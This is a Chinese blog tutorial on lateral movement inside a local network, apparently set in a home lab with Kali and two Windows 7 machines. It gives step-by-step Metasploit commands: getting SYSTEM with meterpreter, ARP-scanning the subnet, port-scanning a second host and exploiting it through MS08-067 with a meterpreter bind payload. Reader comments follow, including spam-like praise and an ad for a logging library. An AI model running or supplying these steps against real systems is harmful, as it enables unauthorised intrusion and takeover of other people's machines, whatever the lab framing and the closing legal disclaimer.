内网渗透 -- 获取内网中其他主机权限
每天早上醒来你有两个选择:一是盖上被子继续做你没做完的梦,二是掀开被子去完成你未完成的梦。。。
---- 网易云热评
环境:小攻:Kali 2020,ip:192.168.1.133
小受:win7 x86,ip:192.168.1.144
小小受:win7 x64 ,ip: 192.168.1.130
一、生成木马及监听主机参考上篇文章:
二、获取小受的IP地址
meterpreter > getsystem
三、获取内网中存活的主机,以一台win03主机为例
meterpreter > run post/windows/gather/arp_scanner rhosts=192.168.1.0/24
四、端口扫描,看看小小受开放了那些端口
1、选择用到的模块:msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
2、查看需要配置的参数:show options
3、设置要扫描的端口:msf5 auxiliary(scanner/portscan/tcp) > set ports 80,135,445,3389,3306
4、设置小小受ip地址:msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.130
5、执行:msf5 auxiliary(scanner/portscan/tcp) > run
五、利用ms08_067漏洞拿下小小受
1、搜索ms08_067模块信息
msf5 auxiliary(scanner/portscan/tcp) > search ms08_067
2、选择该模块并设置payload
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
3、查看需要配置的参数:
msf5 exploit(windows/smb/ms08_067_netapi) > show options
4、设置目标主机并执行
msf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.1.130
msf5 exploit(windows/smb/ms08_067_netapi) > run
禁止非法,后果自负
欢迎关注公众号:web安全工具库
北风之神c: 总结的很全面,写得赞,博主用心了。 此国产日志 https://nb-log-doc.readthedocs.io/zh_CN/latest 使用原生 loggng封装,兼容性和替换性100%,大幅简化logging的使用。 1、日志能根据级别能够自动变彩色。 1 2、print自动变彩色。 3、日志和print在pycahrm控制台的输出都自动可以点击跳转到文件和行号。 4、多进程日志切割安全,文件日志写入性能高 。 5、入参简单,能一键自动记录到多种地方。 6、 兼容 loguru模式。 相比 loguru 有10胜。 pip install nb_log 。
2201_76029893: 为啥run不出来版本信息
普通网友: 大佬的文章写的太精辟了 让我深刻了解了这篇文章的精髓 谢谢大佬分享,希望继续创作优质博文。【我也写了一些相关领域的文章,希望能够得到博主的指导,共同进步!】
普通网友: 阅读这篇博文真是一次愉快的体验!作者的文字真是动人心弦,语言精准而生动。【我也写了一些相关领域的文章,希望能够得到博主的指导,共同进步!】
普通网友: 阅读这篇博文真是一次愉快的体验!作者的文字真是动人心弦,语言精准而生动。【我也写了一些相关领域的文章,希望能够得到博主的指导,共同进步!】